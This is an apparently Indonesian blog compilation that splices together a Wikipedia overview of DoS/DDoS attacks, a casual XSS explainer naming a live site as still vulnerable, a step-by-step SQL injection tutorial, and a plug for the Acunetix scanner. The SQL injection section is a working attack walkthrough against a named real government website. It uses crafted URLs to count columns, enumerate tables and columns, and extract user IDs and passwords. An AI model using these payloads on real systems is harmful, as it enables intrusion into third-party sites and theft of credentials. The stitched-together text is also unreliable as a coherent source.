Bentuk serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak dapat melayani pengguna, atau bahkan mengalami crash. Beberapa tool yang digunakan untuk melakukan serangan DoS pun banyak dikembangkan setelah itu (bahkan beberapa tool dapat diperoleh secara bebas), termasuk di antaranya Bonk, LAND, Smurf, Snork, WinNuke, dan Teardrop.

Meskipun demikian, serangan terhadap TCP merupakan serangan DoS yang sering dilakukan. Hal ini disebabkan karena jenis serangan lainnya (seperti halnya memenuhi ruangan hard disk dalam sistem, mengunci salah seorang akun pengguna yang valid, atau memodifikasi tabel routing dalam sebuah router) membutuhkan penetrasi jaringan terlebih dahulu, yang kemungkinan penetrasinya kecil, apalagi jika sistem jaringan tersebut telah diperkuat.

Percobaan serangan Denial of Service yang dilakukan terhadap sebuah host dengan sistem operasi Windows Server 2003 Service Pack 2 (Beta).

[sunting] Distributed Denial of Service

Cara kerja serangan Distributed Denial of Service sederhana

Distributed Denial of Service (DDoS) atau Penolakan Layanan secara Terdistribusi adalah salah satu jenis serangan Denial of Service yang menggunakan banyak host penyerang (baik itu menggunakan komputer yang didedikasikan untuk melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie) untuk menyerang satu buah host target di jaringan.

Serangan Denial of Service klasik bersifat "satu lawan satu", sehingga dibutuhkan sebuah host yang kuat (baik itu dari kekuatan pemrosesan atau sistem operasinya) demi membanjiri lalu lintas host target sehingga mencegah klien yang valid untuk mengakses layanan jaringan pada server yang dijadikan target serangan. Serangan DDoS ini menggunakan teknik yang lebih canggih dibandingkan dengan serangan Denial of Service yang asli, yakni dengan meningkatkan serangan beberapa kali dengan menggunakan beberapa komputer sekaligus, sehingga dapat mengakibatkan server atau keseluruhan segmen jaringan dapat menjadi "tidak berguna" bagi klien.

Serangan DDoS pertama kali muncul pada tahun 1999, tiga tahun setelah serangan Denial of Service yang asli dengan menggunakan serangan SYN Flooding, yang mengakibatkan beberapa server web di Internet mengalami "downtime". Pada awal Februari 2000, sebuah serangan yang besar dilakukan sehingga beberapa situs web terkenal seperti Amazon, CNN, eBay, dan Yahoo! mengalami "downtime" selama beberapa jam. Serangan yang lebih baru lagi pernah dilancarkan pada bulan Oktober 2002 ketika 9 dari 13 root DNS Server diserang dengan menggunakan DDoS yang sangat besar yang disebut dengan "Ping Flood". Pada puncak serangan, beberapa server-server tersebut pada tiap detiknya mendapatkan lebih dari 150000 request paket Internet Control Message Protocol (ICMP). Untungnya, karena serangan hanya dilakukan selama setengah jam saja, lalu lintas Internet pun tidak terlalu terpengaruh dengan serangan tersebut (setidaknya tidak semuanya mengalami kerusakan).

Tidak seperti akibatnya yang menjadikan kerumitan yang sangat tinggi (bagi para administrator jaringan dan server), teori dan praktek untuk melakukan serangan DDoS justru sederhana, yakni sebagai berikut:

1. Menjalankan tool yang secara otomatis akan memindai jaringan untuk menemukan host-host yang rentan (vulnerable) yang terkoneksi ke Internet. Setelah host yang rentan ditemukan, tool tersebut dapat menginstalasikan salah satu jenis dari Trojan Horse yang disebut sebagai DDoS Trojan, yang akan mengakibatkan host tersebut menjadi zombie yang dapat dikontrol secara jarak jauh oleh sebuah komputer master yang digunakan oleh si penyerang asli untuk melancarkan serangan. Beberapa tool yang digunakan untuk melakukan serangan serperti ini adalah TFN, TFN2K, Trinoo, dan Stacheldraht, yang dapat diperoleh secara bebas di Internet.



2. Ketika si penyerang merasa telah mendapatkan jumlah host yang cukup (sebagai zombie) untuk melakukan penyerangan, penyerang akan menggunakan komputer master untuk memberikan sinyal penyerangan terhadap jaringan target atau host target. Serangan ini umumnya dilakukan dengan menggunakan beberapa bentuk SYN Flood atau skema serangan DoS yang sederhana, tapi karena dilakukan oleh banyak host zombie, maka jumlah lalu lintas jaringan yang diciptakan oleh mereka adalah sangat besar, sehingga "memakan habis" semua sumber daya Transmission Control Protocol yang terdapat di dalam komputer atau jaringan target dan dapat mengakibatkan host atau jaringan tersebut mengalami "downtime".

Hampir semua platform komputer dapat dibajak sebagai sebuah zombie untuk melakukan serangan seperti ini. Sistem-sistem populer, semacam Solaris, Linux, Microsoft Windows dan beberapa varian UNIX dapat menjadi zombie, jika memang sistem tersebut atau aplikasi yang berjalan di atasnya memiliki kelemahan yang dieksploitasi oleh penyerang.

Beberapa contoh Serangan DoS lainnya adalah adalah:

• Serangan Buffer Overflow, mengirimkan data yang melebihi kapasitas sistim, misalnya paket ICMP yang berukuran sangat besar.


• Serangan SYN, mengirimkan data TCP SYN dengan alamat palsu.


• Serangan Teardrop, mengirimkan paket IP dengan nilai offsetyang membingungkan.



• Serangan Smurf, mengirimkan paket ICMP bervolume besar dengan alamat host lain.


• ICMP Flooding

sumber : http://id.wikipedia.org

XSS vulnerability

Apaan sih XSS tuh ?
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)

Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri memiliki arti, merusak sebagian atau keseluruhan dari isi website.

Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter ...
kemudian akan muncul popup baru berisi 'Tes, XSS-nya masih bisa'

sumber: www.ilmuwebsite.com

Teknik dasar sql injection

1. Cari target
Contoh target:
contoh: http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=5


2. Cek lubang dengan menambahkan ' pada url
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=5'

Jika terjadi pesan eror maka web tersebut berlubang.... hore..hehehe


3. Sekarang kasi perintah order ampe ada pesan eror , sebelumnya .... setelah =
silahkan tambahkan -
jadi urlnya:
http://www.kkppi.go.id/baru/publikasi.php?mode=baca&pub_id=-5

Sekarang silahkan kasi order ampe ketemu error....
Contoh:

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 1/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 2/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 3/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 4/*
<---- gak ada eror

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 5/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 6/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 7/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 8/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 9/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 10/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 11/*
<---- gak ada error

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 order by 12/*
<----ada error

Maka tersebut punya 11 colom....

4 Sekarang masukkan perintah unoin all select 1,2,3,4,5,6,7,8,9,10,11/* <<<---
serupakan colom yang ada dallam web tersebut contoh:

http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,5,6,7,8,9,10,11/*

Maka akan keluar angka , misal angka yang keluar adalah 5 ,Angka yang keluar
pada nantinya diganti dengan nama colom atau perintah sql.... spt: @@version
untuk mengecek versi

5. Sekarang mari kita tebak colom dan tabelnya.....
nama tabel: tb_user ,users/* ,admin/*, members/*, dll
nama colom: user_name , user-d, user_is, login_name, username, password, pass
dll

6. Kita coba liat liat tabel yang ada
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables/*

7. Kita coba liat juga kolom2 nya
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,column_name,6,7,8,9,10,11 from information_schema.columns/*

Udah puas liat liat Hah? Terserah deh di apain

8. Sekarang kita coba berburu user_id nya
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,user_id,6,7,8,9,10,11 from tb_user/*

9.Sekarang coba berburu password nya.....
contoh:
http://www.madiun.go.id/baru/publikasi.php?mode=baca&pub_id=-5 union all select
1,2,3,4,password,6,7,8,9,10,11 from tb_user/*

Acunetix Web Vulnerability scanner 6

Acunetix Web Vulnerability scanner 6


ini salah satu tool yang bisa digunakan untuk mendeteksi celah atau bug pada suatu website
banyak sekali fitur yang diwarakan dari XSS sacanner, sql injection, version chehk dan masih banyak lagi
dan juga ada beberapa tool seperti Blind SQL Injector, HTTP Snifer, HTTP Editor, Target Finder,dll

untuk download tool ini bisa di sini

Acunetix Web Vulnerability scanner 6